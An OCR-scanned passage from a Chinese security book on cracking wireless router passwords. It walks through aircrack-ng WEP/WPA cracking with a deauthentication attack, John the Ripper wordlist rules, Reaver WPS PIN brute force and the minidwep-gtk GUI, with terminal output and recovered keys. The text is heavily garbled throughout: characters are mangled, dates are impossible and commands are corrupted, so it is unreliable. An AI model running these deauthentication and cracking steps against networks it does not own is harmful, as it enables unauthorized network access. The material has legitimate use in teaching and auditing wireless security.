Decrypted correctly: 166s 
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提示: 一 旦 收集 到 足够 多 的 IV， 那 么 
破解 WEP 密 码 的 速度 就 非常 快 ， 所 以 采用 
WEP 加 和 窗 是 不 安全 的 。 


8.3.2 使 用 aircrack-ng 破 解 WPA 客 码 。 襄 站 Ss 
破解 WPA 与 WEP 不 同 ，WEP 需 要 收集 评委 六 

大 量 IV 数 据 ， 而 WPA 只 要 抓 取 四 次 握手 信 

恩 即 可 ,但 是 如 果 字 — 典 文件 中 没有 密码 是 


破解 不 出 来 的 。 


1. 认识 字典 文件 


Kali 中 本 身 自 带 了 一 些 字典 文件 ， 查 看 
自 带 字典 文件 的 方法 如 下 。 

(1) /user/share/john 目录 下 的 password. 
lst 字典 文件 ， 如 下 图 所 示 。 


root@kali: /usr/share/john# Ls 

Lnum .chr dumb16 .conf korelogic.conf lowerspace.chr uppernum.chr 
lnumspace,. chr dumb32,conf lanman, chr password,. lst utf6. chr 
Upha ,chr dynamic, conf Latinl,chr regex alphabets,conf 

scii.chr dynamic flat sse formats.conf Un ascii.chr repeats16. conf 

ronjob john.conf Dwer .chr repeats32.conf 

igits.chr john. local .conf lowernun, chr upper, chr 


(2) /usr/share/wfuzz/wordlist/general 日 
录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist,general# ls -lah 

总 用 量 488K 

drwxr-xr-x 2 root root 4.6K 16 月 8 00:58 . 

drwxr-xr-x 8 root root 4.9K 8 月 21 06:52 .. 

-rw-r--r-- 1 root root 2.5K 3 月 25 29018 admin-panels.txt 
-rw-r--r-- 1 root root 22K 3 月 25 2018 big.txt 

-rw-r--r-- 1 root root 1.2K 3 月 25 2018 catala.txt 
-rw-r--r-- 1 root root 6.4K 3 月 25 2018 common.txt 
-rw-r--r-- 1 root root 278 3 月 25 2018 euskera.txt 
-rw-r--r-- 1 root root 141 3 月 25 29018 extensions Common .TXT 
-rw-r--r-- 1 root root 238 3 月 25 29018 http methods .txt 
-rw-r--r-- 1 root root 12K 3 月 25 29018 medium.txt 
-rw-r--r-- 1 root root 401K 3 月 25 2018 megabeast.txt 
-rw-r--r-- 1 root root 244 3 月 25 2018 mutations commcn.txt 
-rw-r--r-- 1 root root 2.1K 3 25 2918 spanish.txt 
-rw-r--r-- 1 root root 79 3 月 25 29018 test.txt 


(3) /usr/share/wfuzz/wordlist/Injections 


目录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/Injections# ls -lah 
总 用 量 40K 


root root 1.5K 3 月 25 29018 XML.txt 
root root 2.4K 3 月 25 2018 XSS .txt 


-rw-r--r-- 
-rw-r--r-- 


drwxr-xr-x 2 root root 4.0K 10 月 8 900:58 . 
drwxr-xr-x 8 root root 4.0K 8 月 21 06:52 .. 
-rw-r--r-- 1 root root 11K 3 月 25 2018 ALL attack.txt 
-rw-r--r-- 1 root root 59 3 月 25 2618 bad chars.txt 
-rw-r--r-- 1 root root 1.6K 3 月 25 2018 SQL.txt 
-rw-r--r-- 1 root root 3.4K 3 月 25 2018 Traversal.txt 
1 
1 


(4) /usr/share/wfuzz/wordlist/others 日 
录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/others# ls -Lah 
总 用 量 72K 

drwxr-xr-x 2 root root 4.9K 16 月 
drwxr-xr-x 8 root root 4.9K 8 月 
-rw-r--r-- 1 root root 418 3 月 
-rw-r--r-- 1 root root 59K 3 月 


8 9690:58 . 

21 06:52 ， 
25 2018 common pass.txt 
25 2018 names .txt 
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(5) /usr/share/wfuzz/wordlist/stess 目录 下 
的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/stress# Ls -Tah 
总 用 量 184K 
drwxr-xr-x 2 root root 4.0K 1L6 月 8 060:58 . 
drwxr-xr-X 8 root root 4.gK 8 月 21 9096:52 .. 
-rw-r--r-- 1 root root 189 3 月 25 2018 alphanum case extra.txt 
-rw-r--r-- 1 root root 124 3 月 25 29018 alphanum case.txt 
-rw-r--r-- 1 root root 52 3 月 25 2018 char.txt 
-rw-r--r-- 1 root root 1.5K 3 月 25 29018 doble uri hex .txt 
-rw-r--r-- 1 root root 155K 3 月 25 2018 test ext.txt 

1 


-rw-r--r-- root root 1.6K 3 月 25 2018 uri hex.txt 


(6) /usr/share/wfuzz/wordlist/webservic- 
es 目录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/webservices# ls -lah 
总 用 量 16K 
drwxr-xr-x 2 root root 4.0K 10 月 8 00:58 ， 
drwxr-xr-x 8 root root 4.0K 8 月 21 06:52 .. 
1 
1 


-rw-r--r-- root root 453 3 月 25 2018 ws-dirs.txt 
-rw-r--r-- root root 111 3 月 25 2018 ws-files.txt 


(7) /usr/share/wfuzz/wordlist/vulns 目录 
下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali:/usr/share/wfuzz/wordlist/vulns# Ts -Tah 


root root 536 3 月 25 2918 vignette.txt 
root root 2.4K 3 月 25 2918 weblogic.txt 


-rw-r--r-- 
-rw-r--r-- 


总 用 量 446K 
drwxr-xr-x 2 root root 4.0K 16 月 8 60:58 ， 
drwxr-xr-x 8 root root 4.0K 8 月 21 66:52 .. 
-rw-r--r-- 1 root root 230 3 月 25 2918 apache.txt 
-rw-r--r-- 1 root root l08k 3 月 25 2018 cgis.txt 
-rw-r--r-- 1 root root 7906 3 月 25 2918 coldfusion.txt 
-rw-r--r-- 1 root root 74K 3 月 25 2918 dirTraversal-nix.txt 
-rw-r--r-- 1 root root 71k 3 月 25 29018 dirTraversal.txt 
-rw-r--r-- 1 root root 72K 3 月 25 2918 dirTraversal-win.txt 
-rw-r--r-- 1 root root 3.1K 3 月 25 29018 domino.txt 
-rw-r--r-- 1 root root 15K 3 月 25 2918 fatwire pagenames .txt 
-rw-r--r-- 1 root root 863 3 月 25 2918 fatwire.txt 
-rw-r--r-- 1 root root 383 3 月 25 2018 frontpage.txt 
-rw-r--r-- 1 root root 485 3 月 z5 290158 iis. Txt 
-rw-r--r-- 1 root root 365 3 月 25 29018 iplanet .txt 
-rw-r--r-- 1 root root 306 3 月 25 2918 jrun.txt 
-rw-r--r-- 1 root root 155 3 月 25 2918 netware.txt 
-rw-r--r-- 1 root root 295 3 月 25 2018 oracle9i.txt 
-rw-r--r-- 1 root root 16K 3 月 25 29018 sharepoint.txt 
-rw-r--r-- 1 root root 571 3 月 25 2918 sql inj.txt 
-rw-r--r-- 1 root root 970 3 月 25 2018 sunas.txt 
-rw-r--r-- 1 root root 220 3 月 25 2018 tests.txt 
-rw-r--r-- 1 root root 1.8k 3 月 25 2918 tomcat.txt 

1 

1 

1 


-rw-r--r-- 1 root root 7.4K 3 月 25 2918 websphere.txt 


(8) /usr/share/wordlist 目录 下 的 字典 文 
件 ， 如 下 图 所 示 。 


root@kali; /usr/share/wordlists# ls -ah 

总 用 显 51M 

Hrwxr -ars 2 root root 4.6K 8 月 21 606:52 
FWXr-xr-x 44B rnoft root 16K 19 月 13 B4:50 


Lrwxrwxrwx 1 root root 25 8 冉 21 66:52 dirb -> /usr/share/dsrb/wordlists 


rwxrwxrwx root root 39 8 月 21 06:52 dirbustor -> /usr/share/dirbuster/wordlists 
FWxrWxrwx root root 35 8 月 21 866:52 dnsmop,. txt -> /usr/shorc/dnsnop/wordlist TLAS.txt 
Mrwxrwxrwx root root 41 8 月 21 66:52 fasttrack, txt "> /usr/share/set/src/fasttrack/wordlist ,txt 


Urwxrwx rx root root 45 8 月 21 86:52 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists 
Nl rwxrwx rx roor roor 46 8 月 71 86:57 soracsploir -> /usr/Share/merasploirt- framework/dara/wordlists 
Lrwxrwxrwx 1 root root 41 8 月 21 B86:52 nmap.lst -> /usr/share/nmap/nselib/data/passwords.Lst 
-FW-r--r-- 1 root root S51M 3 月 3 2613 rockyou.txt.gz 

Nrwxrwxrwx 1 root root 34 8 月 21 66:52 sqlmap,txt -> /usr/sharc/sq\nap/txt/wordlist, txt 

rwxrwxryx ) root root 25 8 月 2) 00;52 wfuzz -> /usr/share/wfyuzz/wordlist 


(9) /usr/share/wordlist 目录 中 有 一 个 压 
缩 文件 rockyou.txt.gz。 其 中 也 包含 一 个 字 
典 文 件 解 压缩 ， 如 下 图 所 示 。 


root@kali:/usr/share/vwordlists¥ gunzip rockyou.txt.gz 
root@kali:/usr/share/wordlists# ls 

dirb dnsmap .txt fern-wifi nmap .lst sqlmap .txt 
dirbuster fasttrack.txt metasploit rockyou.txt wfuzz 
root@kali:/usr/share/wordlists# cat rockyou.txt | wc -1 
14344392 


~ 


2. 破解 WPA 密 码 
破解 文件 之 前 ， 首 先 需 要 设置 无 线路 
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由 器 的 加 密 方 式 ， 设 置 方 法 为 : 首先 登 
录 无 线路 由 器 ， 在 “无 线 设 置 ” 中 将 “无 
线 安 全 设置 ”设置 成 WPA 加 密 ， 如 下 图 
所 示 。 修 改 加 密 方 式 后 需 重 启 路 由 才能 
生效 。 


® WPA-PSK/WPA2-PSK 


认证 类 型 : 

加 密 算 法 : 

PSI 得; 
《8-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字符 ) 

组 密 钥 更 新 周 


册 
【单位 为 种 ， 最 小 值 为 30 ， 不 更 新 刚 为 0) 


破解 WPA 蜜 码 的 具体 操作 步骤 如 下 : 
使 用 airmon-ng strat wlan0 命 令 启 动 网 
卡 并 进入 monitor 模 式 9 如 下 图 所 示 。 


root@kali:~# airmon-ng start WwWLane 


PHY Interface Driver Chipset 


phyl wLane rt28396USsb Ralink Technology, Corp. RT2878/RT30670 


(mac886821] monitor mode vif enabled for {phyljwlan® on [phyljwlLanemon) 
(mac88211 station mode vif disabled for [phyljwLang) 


使 用 airodump-ng -c < 信道 > --bssid 
<AP-MAC 地 址 > -w < 保存 文件 名 > 
Wlan0mon 命 令 ， 启 动 数据 抓 包 功 能 ， 并 保 
存 抓 取 后 的 文件 ， 如 下 图 所 示 。 


cH 1 ][ Elapsed; 1 min ][ 2z618-19-16 23;:27 


BSSID PWR RXQ Beacons 考 Data， 考 /5 CH MB ENC CIPHER AUTH ESSID 
1C:FA:68:01:2F:08 1 53 459 16 9 1 276 WPA2 CCMP PSK Test-661 
BSSID STATION PWR Rate Lost Frames Probe 
1C:FA:68:61:2F:68 DC:6D:CD:66:FE:CB 1 8 - 6 1 21 


如 果 AP 与 STA 有 关联 ， 可 以 使 用 
arieplay-ng -0 1 -a <AP-MAC 地 址 > -c < 已 连 
接 STA-MAC 地 址 > wlan0mon 命 令 ， 执 行 该 
命令 后 ， 会 解除 AP 与 STA 的 关联 ， 如 下 图 
所 示 。 


root@kali:~# aireplay-ng -0 1 -a 1C:FA:68:Bl1:2F:68 -C DC:6D:CD:66:FE:CB wlanemon 
64:15:96 Waiting for beacon frame (BSSID: 1C:FA:68:01:2F:88) on channel 1 
04:15:867 Sending 64 directed DeAuth (code 7}). STHMAC: {DC:6D0:CD:66:FE:CB] [ 8|55 ACKs] 


当 抓 取 到 AP 与 STA 关 联 时 的 四 次 握手 
言 息 ， 下 图 会 给 出 相应 的 提示 信息 。 


cH 1 ][ Elapsed: 3 mins ][ 2018-160-18 23;:36 ][ WPA handshake: 1C:FA:68:61;2F;:608 


BSSID PWR RXO Beacons #Data, #/5s CH MB ENC CIPHER AUTH ESSID 
1C:FA:68:01:2F:068 1 39 1116 83 熏 1 2796 WPA2 CCMP PSK Test-991 
BSS5ID STATION PWR Rate Lost Frames Probe 


1C:FA:68:01:2F:88 DC:6D:CD:66:FE:CB 9 le- 0e 1912 92 Test-661 


使 用 aircrack-ng -w < 字典 文件 > 
wpa-01.cap 命 令 ， 即 可 破解 出 WPA 密 码 ， 如 
下 图 所 示 。 可 以 看 到 每 秒 筛选 2174 个 密码 
文件 ， 如 果 字 典 中 存在 客 码 文件 一 定 会 破 


解 出 来 ， 这 里 获取 的 密码 为 Password。 


[66:60:00] 172/647 keys tested (2174.05 k/s) 


Time left: 9 seconds 26 .58% 


KEY FOUND! [ Password | 


Master Key : 82 94 7A F8 6C 35 F6 53 DD QF 7F 96 4A 46 17 AB 


D1 43 4A 74 D1 42 30 O90 86 26 60 5C D5 B7 BD 17 


: 51 FB B2 7C FA 7B 1F 8D ES B4 47 12 ED 6B QA 08 
46 69 45 F9 E9 15 lB EA 45 34 D3 D2 E9 6F DC 2E 
FB 9A FE 82 50 92 77 D5 F1 94 89 00 09 09 99 0Q 
90 80 66 690 600 09 O00 00 60 66 60 00 pO O90 900 QQ0 


Transient Key 


EAPOL HMAC : 3E 78 E2 FA C6 9D 53 78 FQ 95 8F F7 EC 7C 7B A2 


8.3.3 ”使 用 厢 R 工 具 破 解 WPA 密 码 


JTR (John the Ripper) 是 一 个 快速 的 
密码 破解 工具 ， 用 于 在 已 知 密 文 的 情况 下 
答 试 破解 出 明文 的 密码 软件 ， 文 持 目 前 大 
多 数 的 加 密 算 法 。 

使 用 JTR (John The Ripper) 破解 密码 
的 操作 步骤 如 下 : 
打开 配置 文件 并 搜索 List.Rules: 
Wordlist 字 段 ， 如 下 图 所 示 。 

# Wordlist mode rules 


[List.Rules:Wordlist] 
# Try words as they are 


# Lowercase every pure alphanumeric word 
-C >3 I?X10 

# 和 Capitalize every pure alphanumeric word 
-C (?a >2 !?X CQ 


调整 到 List,Rules:Wordlist 字 段 的 结尾 
处 ， 加 入 “$[0-9] $[0-9] $[0-9] $[0-9]” 字 
段 ， 如 下 图 所 示 ， 这 样 便 可 以 修改 客 码 生 
成 规则 。 

-[:c] <* >2 !?A \pl[\lc] M [PI] Q 

# Try the second half of split passwords 

-S X* 六 

-S-C x** ML 0Q 

$[0-9]$[0-9]$[0-9]$[90-9] 

# Case toggler for cracking MD4-based NTLM hashes 
# given already cracked DES-based LM hashes. 


# Use --rules=NT to use this 
[List.Rules:NT] 


使 用 john --wordlist=< 黎 码 文 件 > 
--Tules --stdout 命 令 ， 可 以 通过 相应 的 规则 
生成 密码 ， 如 下 图 所 示 。 其 中 --wordlist 是 
读 取 黎 码 文件 ; --rules 对 该 文件 使 用 规则 ; 
--stdout 进 行 显示 。 
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root@kali:-~# john --wordlist=dd.txt --rules --stdout 
1550992 
1500992 
1301234 
1321234 


4p 90:690:90:906 166.606s# (2018-10-19 05:14) 46.99p/S 1321234 


使 用 john --wordlist=dd.txt --rules 
--Sstdout | alrcrack-ng -e Test-001 -w - wpa-01.cap 
命令 ， 配 合 aircrack-ng 进 行 密码 破解 。 下 图 
为 执行 效果 ， 可 以 看 出 窗 码 为 Password666。 


[80:60:60696] 4 keys tested (21.53 k/s) 


Current passphrase: Password666 


Master Key : AB 3D B3 21 F4 B6 8F 97 7D CE 6E E9 33 75 4E 98 
66 34 78 93 4B EA 7D AG DA F9 A4 95 81 18 76 6B 


: El D9 12 9A 16 34 8D 26 73 D4 38 AE BB BD 1E 9D 
BB 53 E7 DD 85 81 Fe 28 C9 87 36 63 AB 41 65 Q3 
59 75 9D 96 68 69 3F 81 BB 5F 28 55 86 5B 3C FA 
OA F4 F5 F4 CC AE 64 FD 3E 3E 58 1A 8D E8 DC 3B 


Transient Key 


EAPOL HMAC : 93 46 62 15 49 1F 11 48 QE A5 9A 08 F2 4C 72 42 


Passphrase not in dictionary 


8.3.4 使 用 Reaver 工 具 破 解 WPS 密 码 


Reaver 工 具 是 目前 流行 的 无 线 网 络 攻击 2 


工具 ， 它 主要 针对 的 是 WPS 漏 洞 。Reaver 
工具 会 对 WiFi 保 护 设 置 (WPS) 的 注册 PIN 
码 进行 暴力 破解 攻击 ， 并 尝试 恢复 出 WPA/ 
WPA2 密 码 。 

使 用 Reaver 工 具 破解 密码 的 操作 步骤 
如 下 : 


使 用 reaver 命 令 ， 查 看 reaver 工 具 的 帮 
助 信息 ， 下 图 为 所 需 参 数 。 


root@kali:~# reaver 


Reaver v1.6.5 WiFi Protected Setup Attack Tool 
Copyright (c) 2811, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol .com> 


Required Arguments : 
i, --interface=<wlan> 
-b, --bssid=<mac> 


将 网 卡 设置 成 monitor 模 式 ， 寻找 支 
持 WPS 的 AP， 使 用 wash -U -i wlan0mon 命 
令 。 下 图 为 执行 效果 。 其 中 -U 是 表示 以 
UTF-8 字 符 编 码 进行 显示 ，-i 是 具体 使 用 的 
网 卡 接 口 。 


root@kali:-# wash -U -i wlandmon 
BSSID ch dBm WPS Lck Vendor ESSID 


Name of the monitor-mode interface to use 
BSSID of the target AP 


42:31:3C:E1:D9:69 9 -59 No RalinkTe 小 米 共 享 wiFi D668 
64:95:E6:12:CA:21 11 -57 No Broadcom Chinanet-KTJK9F 
AC:A2:13:85:FC:C9 4 -59 No RalinkTe lfwx 


A8:57:4E:C7:F8:74 11 -57 Unknown wangyangyang 
28:2C:B2:EA:D5:54 11 -61 No Unknown TP-LINK EAD554 
40:A5:EF:67:85:A2 1 -59 NO 主 接 93-1 


NPNNNNNN 
OOOOOOPO@ 
本 
© 


DC:C6:4B:Cl:B3:5C 8 -61 
38:E2:DD:74:Al:AA 4 -61 


No RalinkTe ChinaNet-TKae 
No RalinkTe ChinaNet-nkkk 
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侈 提示 : 还 可 以 使 用 airodump-ng 这 个 工具 
来 寻找 支持 WPS 的 AP， 使 用 airodump-ng 一 
wps wlan0mon 命 令 ， 同 样 可 以 寻找 到 支持 
WPS 功 能 的 AP， 下 图 为 执行 效果 。 


root@kali;-# airodump-ng --wps wlangmon 

cH 5 J[ Elapsed: 38 s ][ 2618-16-26 0:55 

B55ID PWR Beaccons #0ata, #/5 CH MB ENC CIPHER AUTH WP5 ES55ID 
an6:n03:CD:33:66:73 -9 5 0 ee 6 495 OPN TPGuest 6073 
F4:83:;CD;33:60:73 20 37 9 9 5 465 WPAZ2 CCHP PSK 二 技 
1lC:FA:68:01:2F:08 -30 9 9 9 1 279 WPA2 CCMP PSK 人 ,日 Test -991] 
E4:68:A3:7C:BI:B9 -36 2 8 8 6 Sde. WPA2 CCMP MGT CMCC 
F4:68:A3:7r:R1:R27 -36 A 日 6§ sd4e. NPN CMCC-X] 
E4:68:A3:7C:B1:B5 -36 4 0 0 6 S54e. OPN A 
E4:68:A3:7C:B1:B1 -38 3 8 [3 6 Si4e. OPN and-Business 
E4;68;A3;7C;EF;F5 -39 3 8 9 1 S54e, OPN 8.09 5 
E4:68:A3:7C:EF:F2 -46 2 9 8 1 S54e. OPN 6.6 CMCC-X] 


破解 PIN 码 ， 使 用 reaver -1 wlan0mon 
-b <AP-MAC 地 址 > -vv -c 3 命令 ， 其 中 -vv 是 
显示 详细 信息 ， -C 选 择 信 道 ， 如 下 图 所 示 。 
= ™ ™ 人 全 产 一 » wr 

每 次 随机 选择 一 个 PIN 码 进行 发 送 。 

Trying pin "33335674" 

Sending authentication request 

Sending association request 

Associated with 1C:FA:68:81:FB:EA (ESSID: TP-LINK 81FBEA) 
Sending EAPOL START request 
Received identity request 
Sending identity response 
Received M1 message 

Sending M2 message 

Received M3 message 

Sending M4 message 

Received WSC NACK 


Sending WSC NACK 
0.05% complete @ 2018-11-04 23:55:33 (28 seconds/pin) 


全 提示 : 在 破解 的 过 程 中 ， 如 果 加 入 -区 1 


获取 到 PIN 码 后 ， 可 以 通过 PIN 码 获 
取 窗 码 ， 这 时 可 以 使 用 reaver -i wlan0mon 
-b<AP-MAC 地 址 > -vv -p <PIN 码 > 命令 来 获 
取 和 窗 码 ， 这 里 获取 的 黎 码 为 Password， 如 下 
图 所 示 。 


[+] Received MI message 

+] Sending M2 message 

+] Received M3 message 

+] Sending M4 message 

+] Received M5 message 

+] Sending M6 message 

+] Received M7 message 

+] Sending WSC NACK 

+] Sending WSC NACK 

+] Pin cracked in 4 seconds 


+] WPS PIN: '35169857， 
+] WPA PSK: 'Password'’ 
+] AP SSID: 'Test-001， 


+] Nothing done, nothing to save. 


a 8.4 使 用 CDlinux 系 统 破解 无 


线路 由 保密 但 


CDlinux 系 统 中 自 带 有 许多 破解 工具 ， 
Wmimidwep-gtk 、 FeedingBottle、Inflator 
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等 ， 使 用 这 些 工具 可 以 破解 无 线路 由 器 的 
密码 。 


8.4.1 使 用 minidwep-gtk 破 解 WEP 
密码 
使 用 minidwep-gtk 破 解 WEP 密 码 需 要 以 
下 几 个 步骤 : 


双击 CDlinux 采 面 minidwep-gtk 图 标 ， 
如 下 图 所 示 。 


minidwep-gtk 


启动 minidwep-gtk 首 先 会 弹出 一 
告 信 息 框 ， 如 下 图 所 示 。 阅 读 完 警告 
后 单 击 OK 按钮 。 


个 警 


信息 


‘ 


本 软件 是 家 用 无 线路 由 器 安全 审计 之 工具 
切 勿 用 于 非法 行为 

盗用 他 人 无 线 网 络 涉嫌 违法 

丢弃 WEP 加 密 ， 使 用 WPA2 加 密 
关闭 路 由 WPS 


下 图 为 启动 后 的 minidwep-gtk， 左 侧 
的 “无 线 网 卡 ” 中 可 以 看 到 接 入 的 无 线 网 
“信道 ”可 以 选择 对 那 种 信道 进行 扫 
描 ;， “加 窖 方式 ”可 以 选择 针对 哪 种 加 敌 方 
式 进行 破解 。 


无 线 网 卡 路 由 MAC 名 称 强度 信道 ”加 窄 方式 客户 饰 MAC 
wian0 5 扫 所 
Wlan0 Ralink 
RT2870V3070 rt2800usb 
- [phy0] 
信道 [oe 
A vw 
加 劾 方式 L 启 动 
WPA/WPA2 = 
: 24 Reaver 
Co 11:06:22 一 等 待 局 令 中 
replay-ne -4 
有 repl NE -9 A 停止 
repls 
replay-ne 
E 退 出 
排序 pi 到 
站 VS 歼 量 : 


移 注 意 : 如 果 “ 无 线 网 卡 ” 中 没有 检测 到 
无 线 网 卡 ，minidwep-gtk 软 件 会 给 出 提示 ， 
此 时 可 以 检查 无 线 网 卡 是 否 插 入 并 可 用 。 


切换 加 密 方 式 为 WEP 并 单 击 “ 扫 描 ” 
按钮 ， 扫 描 出 结果 后 会 给 出 详细 信息 ， 如 


无 线 网 卡 路 由 MAC 名 称 。 强度 传道 加 密 方 式 客户 端 MAK 


: 1C'FA'68:01:2F:08_Test-001___ -127_ 1__WEP_DC:SD:CD:66:FE:CB_ 


wlan0 Da 


Wan Ralink 
RT287073070 rt2800usb 


- |phyo] 
信道 
All | Db 


wm 


24 


11:12;43--> 等 待命 令 中 


Ld 

WW] Mireplay-ng -3 

[ | Aireplay-ne 4 

ad 

[L Mreplay-.ng -6 

[ | Mireplay-ne -了 
注入 速率 

500 本 


IV5 歼 量 ; 0 


单 击 “ 启 动 ”按钮 ， 此 时 minidwep-gtk 
会 调用 aireplay-ng 打 断 客户 端 与 AP 之 间 的 连 
接 ， 抓 取 有 效 连接 信息 并 开始 重 放 数 据 包 ， 
此 时 IVs 数 量 会 不 断 增 加 ， 在 IVs 数 量 增 加 的 
同时 minidwep-gtk 营 试 进行 破解 黎 码 ， 如 下 
图 所 示 ， 玻 解 出 黎 码 后 会 给 出 提示 。 


无 线 网 卡 路 由 MAC 名 禾 强度 信道” 加密 方式 客户 端 MAC 
wlan0 BD 雪 1C.FA'68:01:2F:08_ Test-001 -106 1 WEP 
Wand Ralink 
RT287073070 rn2800usb 
- |phyO] 
信道 
All i 
加 密 方式 
WEP Dd 
Ek 24 
| Aireplay-ne -2 
回 Nmaplayng 3 15.39.22-->Ajreplay-ng -2 -p 0841 成 功 ,开始 注入 .… 站 
门 Mireplay-ne -4 15:39:16-> 尼 动 aireplay-ng -5 
中 Aireplayng 5 15:39:16-> 启 动 aireplay-ng -3 
CAI 5 
EE eae 15:39;16-> 尼 动 aireplayng -2 -p 0841 
| | Aireplay-ne -7 
注入 速率 15:39:16--> 拥 到 一 个 客户 端 MAC:DC:6D:CD:56:FE:CB 
S00 4 IVs 致 量 : 76 


8.4.2 ”使 用 minidwep-gtk 破 解 WPA/ 


WPA2 密 码 
使 用 minidwep-gtk 破 解 WPA/WPA2 密 码 
需要 以 下 几 个 步 又 : 
局 动 minidwep-gtk 并 将 加 窗 方 式 调整 为 
WPA/WPA2 方 式 并 启动 扫描 ， 如 下 图 所 示 。 


无 线 网 卡 路 由 MAC 名 称 强度 信道” 加密 方式 客户 活 MAC 
wlan0 者 国 | Fa4:s3:CD:33:60:73_ 交 .会 四 -113 6 WPa2WPA | cs 
wland Falink -FA-ER-D1-2F。 "ED: .| ml 
RT287013070 rt2 b 1C:FA-6B:01:2F:0B_Test-001__-86_1 WPA2WPA_DC:6D:CD:b6FE:CB_ 
- [phyo] 04.95:E6:12:CA:21_Chinanet-KTJK9F__ -62_11_ WPA2WPA__ wps 
信道 747D:24:26:E6:00_xywj -62_10_WPA2 0 由 字 奥 
All Iw | ACTAONEA3122 DOZYY_ -62_ 日 WPA? 
加 密 方式 EC:26:CA:Ad:48:C2_TPLLHINK 48C2 -62 11 WPA2WPA i 
WPA/WPA2 | | LI4TSQnR2TD'EC_hanshirht -Rl 11 WPAZWPA bs [= 
i Se | 
方式 沅 泽 二 二 24 
I Alreplay .ng -2 Reaver 
回 Aireplay.ng -3 18;24:21--> 等 待命 令 中 
L]| Aireplay-ng 
[Aireplay. ne A 停止 
[L] Aireplay-ne 
口 Aireplay-ng *7 退出 
排序 pin 码 


JIVS 致 量 :0 
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选择 需要 破解 的 AP 单 击 “ 启 动 ” 按 
钮 ， 一 单 获取 到 握手 包 信 息 minidwep-gtk 会 
给 出 提示 ， 如 下 图 所 示 。 


Ld minidwep-gtk-30513-fine 
记 疆 网 卡 路 由 MAC 名 着 号 上 腊 信 站 ” 加 呈 方 去 ; 客户 JIMAC 
wlan0 v | F4:83:CD:33:60:73_ 风 .从 网 罗 团 .. -113 6 WPAZWPA 目 < 委 描 
wland Ralink E ee 
RT2870307D rt2800usb | 
~ Iphyo] 
pp D 沪 字 绒 
3 . DE 
内 | v | 
生计 方 工 | 局 动 
WPAWPA2 | | 
方 忒 选择 
[A Alreplay, nz -2 Reawer 
[A Aireplay. nz -3 
| | Aircplay-nz < 
加 Alreplay- na -5 handshake file:x/tmp/1C-FA-68-01-2F-D8_handshake.cap A 入 
AIrenlay ne =6 18:26221->WPA 提 手包 捕获 ! 
图 18:25:51-->Wait 30 seconds for authentication handshake! ER 出 
3 万 pin 码 | 加 | < 


[VS 殊 量 ; 53 


[step 图 单 击 OK 按 钮 ， 在 密码 选择 界面 中 选 


Ed ] ee mn 
|Blaces | | Name Y |Size | Modified | 广 
9 5earch 生 minidwep 18-2B 
© Recently Used 闻 ssh-oTQzqQxp2538 18:22 
By roor 1C-FA-68-01-2F-08_handshake.cap 104.0KB 18:26 
-= Pile System 1C-FA-68-01-2F-08 handshake .cap.hccap 392 bytes 18:26 
号 CDUNUX 1C-FA-68-01-2F-08 handshake.capwkp 2.6KB 18:26 
bash gtk.2748 Obytes 1822 
fcitx-socket-:0 0bytes 18:22 
minidwep _essid 529 bytes 2010 年 02 月 02 日 
serverauth.kSgiU7 52 bytes 18:22 
园 wordlist.wxit 52MB 2009 年 10 月 096 
| 
党 ”mm | [= 
6 cancal | ok 


通过 字典 比 对 计算 出 WPA/WPA2 的 密 
码 ， 如 果 字 典 里 存在 密码 一 定 会 破解 出 来 ， 
破解 出 密码 后 会 给 出 提示 ， 如 下 图 所 示 。 


一 minidwep-gtk-30513-fine 
无 绪 网 下 陪 由 MAC 名 称 强度 ”信和 送 ”加 办 方 式 MAC 
pe | 1C:FA:68:01:2F:08_Test-001 -127 1 _WPA2WPA 目 
ee 5 扫 挤 
wan0 halink F4:83:CD:33;60:73_ 风 . 谷 罗 四. 装 ..， -127_ 6 WPA2WPA__ 
RT2870Y3070 rt2800usb 
"|phyO] CB:3A:35:06:68:00_ BL -66 _ 13 WPA2WPA __ 
舍 首 1 中 字 贡 
仁 硬 \ IbA 3 
则 | (人 Essid‘Test-001 
加 中方 式 Bssid: 1C:FA:68:01-2F:08 IA2_ wps i 
一 WPA KEY: Password 和 [= 
WPA/WPA2 本 
万 过 这 了- EE ga | 
网 Aireplay-nz -2 | Reave 
加 Mireplay. nz =3 | 
口 Mireplay-nz -4 10"02238-->aircraccng 已 经 退出 
加 下 Teplay ng -5 1f00:11--> 已 启动 aircrackcng 搜寻 字典 中 的 密码 国生 二 一 
加 记号 Handshake file 和 THashcatytm pyATC-FA-68-D01-2F-08_handshake.cap.hccal 
[] Aircplay-nz -7 
[ 区 到 n 2 二 ER! 
序 pin 列 


8.4.3 使 用 minidwep-gtk 和 破解 WP9 密 码 


使 用 minidwep-gtk 破 解 WPS 密 码 需 要 以 
下 几 个 步骤 : 
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尼 动 minidwep-gtk 并 局 动 扫描 ， 如 果 
是 破解 WPS 方 式 的 PIN 码 不 用 关心 加 窗 方 
式 ， 在 扫描 出 的 AP 列表 中 ， 如 果 存 在 WPS 
在 其 尾部 会 进 行 标 注 ， 如 下 图 所 示 。 


minidwep-gtk-30513-fine EE 
无 线 网 卡 路 由 MAC 名 生 强度 信道 ”加 府 方 式 客户 妊 MAC 
wlan0 vw | | F4:83:CD-33:60:73_ 风 . 欠 罗 四 加 -110_ 6_ WPAZWPA_58:00:E3:B9:08:1 1 人 
$s 扫描 
wland Ralink 1C:FA:68:01:2F:08_Test-001 -71 1 WPA2WPA wps 
RT2870/307D rt2800usb ca 
[phwO] 00:2F:D9:D9:02:FD_ChinaNet-6Wrc __ -65_ 13 WPA 
舍 首 1C:60:DE:62:BA:OE_222 _ -65 _13 WPA2 D 移 字典 
A w | | 00:2F:D9.D7:F8:0D_ChinaNet-TWnr__-63_ 13_ WPA_ 
. 70:AF'5A;09-1E:9D_TP794613852 -61 13 WPA2 
加 密 方 式 A a 上 启动 
b8:DB:54:31:BE:27_@PHICOMM 25 60_ 4 WPA2 MG 
WPA/WPA2 Dd - 
| . 
[a Reaver 
